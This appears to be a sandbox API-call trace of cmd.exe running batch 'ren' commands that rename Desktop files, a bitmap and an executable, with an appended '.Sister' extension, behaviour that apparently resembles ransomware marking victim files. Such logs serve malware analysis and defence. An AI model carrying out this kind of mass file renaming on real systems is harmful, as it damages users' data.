[0183.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.321] GetFileType (hFile=0x50) returned 0x2 [0183.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0183.321] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0183.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.448] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956e450*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956e450*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0183.624] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bat\" ") returned 58 [0183.624] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.624] GetFileType (hFile=0x50) returned 0x2 [0183.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0183.624] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0183.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.736] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0183.822] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0183.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.822] GetFileType (hFile=0x50) returned 0x2 [0183.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0183.822] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0183.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.829] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0183.845] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0183.947] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0183.947] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0183.947] malloc (_Size=0xffce) returned 0x21ed969fe40 [0183.947] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0183.947] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0183.947] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0183.947] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0183.947] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0183.947] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0183.947] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0183.947] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0183.947] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0183.947] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0183.947] ??_V@YAXPEAX@Z () returned 0x1 [0183.947] GetProcessHeap () returned 0x21ed8c70000 [0183.947] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed937c200 [0183.947] GetProcessHeap () returned 0x21ed8c70000 [0183.947] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c200, Size=0x84) returned 0x21ed937c200 [0183.947] GetProcessHeap () returned 0x21ed8c70000 [0183.947] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c200) returned 0x84 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed937eca0 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed937c2a0 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c2a0, Size=0x84) returned 0x21ed937c2a0 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c2a0) returned 0x84 [0183.948] malloc (_Size=0xffce) returned 0x21ed969fe40 [0183.948] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d651c0 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9558fe0 [0183.948] _wcsicmp (_String1="vkmlI37o0H7OT_ Ymw.bmp", _String2=".") returned 72 [0183.948] _wcsicmp (_String1="vkmlI37o0H7OT_ Ymw.bmp", _String2="..") returned 72 [0183.948] GetFileAttributesW (lpFileName="vkmlI37o0H7OT_ Ymw.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp")) returned 0x20 [0183.948] GetProcessHeap () returned 0x21ed8c70000 [0183.948] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9990070 [0183.950] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9990080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0183.950] SetErrorMode (uMode=0x0) returned 0x0 [0183.950] SetErrorMode (uMode=0x1) returned 0x0 [0183.950] GetFullPathNameW (in: lpFileName="vkmlI37o0H7OT_ Ymw.bmp", nBufferLength=0x7fe7, lpBuffer=0x21ed969fe40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp", lpFilePart=0xa6cf4fd660*="vkmlI37o0H7OT_ Ymw.bmp") returned 0x2e [0183.950] SetErrorMode (uMode=0x0) returned 0x1 [0183.950] GetProcessHeap () returned 0x21ed8c70000 [0183.950] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955a840 [0183.950] _wcsicmp (_String1="vkmlI37o0H7OT_ Ymw.bmp", _String2=".") returned 72 [0183.950] _wcsicmp (_String1="vkmlI37o0H7OT_ Ymw.bmp", _String2="..") returned 72 [0183.950] GetFileAttributesW (lpFileName="vkmlI37o0H7OT_ Ymw.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp")) returned 0x20 [0183.950] ??_V@YAXPEAX@Z () returned 0x1 [0183.950] malloc (_Size=0xffce) returned 0x21ed969fe40 [0183.950] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0183.950] malloc (_Size=0xffce) returned 0x21ed96afe20 [0183.950] ??_V@YAXPEAX@Z () returned 0x21ed96afe20 [0183.951] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp")) returned 0x20 [0183.951] malloc (_Size=0xffce) returned 0x21ed923fd00 [0183.951] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0183.951] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed9558ff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9558ff0) returned 0x21ed8d65640 [0183.951] malloc (_Size=0xffce) returned 0x21ed924fce0 [0183.951] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0183.951] ??_V@YAXPEAX@Z () returned 0x1 [0183.951] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0183.994] FindNextFileW (in: hFindFile=0x21ed8d65640, lpFindFileData=0x21ed9558ff0 | out: lpFindFileData=0x21ed9558ff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="vkmlI37o0H7OT_ Ymw.bmp", cAlternateFileName="")) returned 0 [0183.995] GetLastError () returned 0x12 [0183.995] FindClose (in: hFindFile=0x21ed8d65640 | out: hFindFile=0x21ed8d65640) returned 1 [0183.995] ??_V@YAXPEAX@Z () returned 0x1 [0183.996] ??_V@YAXPEAX@Z () returned 0x1 [0183.996] ??_V@YAXPEAX@Z () returned 0x1 [0183.996] ??_V@YAXPEAX@Z () returned 0x1 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65640 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95660, Size=0x16) returned 0x21ed8c957e0 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c957e0) returned 0x16 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937bcb0 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bcb0, Size=0xb2) returned 0x21ed937bcb0 [0183.998] GetProcessHeap () returned 0x21ed8c70000 [0183.998] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937bcb0) returned 0xb2 [0183.999] GetProcessHeap () returned 0x21ed8c70000 [0183.999] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956e670 [0183.999] GetProcessHeap () returned 0x21ed8c70000 [0183.999] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956e670, Size=0x30) returned 0x21ed956e670 [0183.999] GetProcessHeap () returned 0x21ed8c70000 [0183.999] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956e670) returned 0x30 [0183.999] GetProcessHeap () returned 0x21ed8c70000 [0183.999] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956e6b0 [0183.999] malloc (_Size=0x1ff9c) returned 0x21ed969fe40 [0184.002] GetProcessHeap () returned 0x21ed8c70000 [0184.002] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cb50 [0184.002] GetProcessHeap () returned 0x21ed8c70000 [0184.002] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937cfd0 [0184.002] ??_V@YAXPEAX@Z () returned 0x1 [0184.002] malloc (_Size=0x1ff9c) returned 0x21ed969fe40 [0184.002] GetProcessHeap () returned 0x21ed8c70000 [0184.002] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d090 [0184.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed969fe40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0184.002] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c2f0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65280 [0184.002] FindClose (in: hFindFile=0x21ed8d65280 | out: hFindFile=0x21ed8d65280) returned 1 [0184.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c2f0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64a40 [0184.002] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0184.003] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9840993c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9840993c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c2f0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64a40 [0184.003] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0184.003] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9840993c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9840993c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c2f0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0184.003] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0184.004] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0184.004] GetProcessHeap () returned 0x21ed8c70000 [0184.005] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d672b0 [0184.005] ??_V@YAXPEAX@Z () returned 0x1 [0184.005] ??_V@YAXPEAX@Z () returned 0x1 [0184.005] GetProcessHeap () returned 0x21ed8c70000 [0184.005] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956e6b0, Size=0x490) returned 0x21ed956e6b0 [0184.005] GetProcessHeap () returned 0x21ed8c70000 [0184.005] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956e6b0) returned 0x490 [0184.005] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0184.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.005] GetFileType (hFile=0x50) returned 0x2 [0184.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0184.005] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0184.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.078] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0184.225] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0184.225] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0184.225] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0184.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.225] GetFileType (hFile=0x50) returned 0x2 [0184.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0184.225] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0184.344] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.345] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0184.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.428] GetFileType (hFile=0x50) returned 0x2 [0184.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0184.428] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0184.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.499] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956e680*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed956e680*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0184.576] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0184.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.576] GetFileType (hFile=0x50) returned 0x2 [0184.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0184.576] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0184.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.714] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0184.825] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0184.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.825] GetFileType (hFile=0x50) returned 0x2 [0184.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0184.825] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0184.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0184.933] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0185.083] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0185.283] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0185.284] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0185.285] malloc (_Size=0xffce) returned 0x21ed969fe40 [0185.285] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0185.285] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0185.285] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0185.285] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0185.285] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0185.286] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0185.286] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0185.286] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0185.286] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0185.286] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0185.286] ??_V@YAXPEAX@Z () returned 0x1 [0185.286] GetProcessHeap () returned 0x21ed8c70000 [0185.286] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed955cfa0 [0185.286] GetProcessHeap () returned 0x21ed8c70000 [0185.286] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955cfa0, Size=0x130) returned 0x21ed955cfa0 [0185.286] GetProcessHeap () returned 0x21ed8c70000 [0185.286] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955cfa0) returned 0x130 [0185.286] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.286] malloc (_Size=0xffce) returned 0x21ed969fe40 [0185.286] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0185.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.287] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed969fe40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0185.288] ??_V@YAXPEAX@Z () returned 0x1 [0185.288] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6af30 [0185.289] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed955d0e0 [0185.289] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d0e0, Size=0x130) returned 0x21ed955d0e0 [0185.289] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d0e0) returned 0x130 [0185.289] malloc (_Size=0xffce) returned 0x21ed969fe40 [0185.289] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0185.289] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64a40 [0185.289] GetProcessHeap () returned 0x21ed8c70000 [0185.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955a0f0 [0185.290] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0185.290] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0185.290] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0185.290] GetLastError () returned 0x2 [0185.290] GetProcessHeap () returned 0x21ed8c70000 [0185.290] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99a0060 [0185.290] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99a0070 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0185.290] SetErrorMode (uMode=0x0) returned 0x0 [0185.290] SetErrorMode (uMode=0x1) returned 0x0 [0185.290] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed969fe40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0185.290] SetErrorMode (uMode=0x0) returned 0x1 [0185.291] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0185.291] GetProcessHeap () returned 0x21ed8c70000 [0185.291] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955af90 [0185.293] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0185.293] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0185.293] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0185.293] GetLastError () returned 0x2 [0185.293] ??_V@YAXPEAX@Z () returned 0x1 [0185.293] malloc (_Size=0xffce) returned 0x21ed969fe40 [0185.293] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0185.293] malloc (_Size=0xffce) returned 0x21ed96afe20 [0185.293] ??_V@YAXPEAX@Z () returned 0x21ed96afe20 [0185.293] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0185.293] GetLastError () returned 0x2 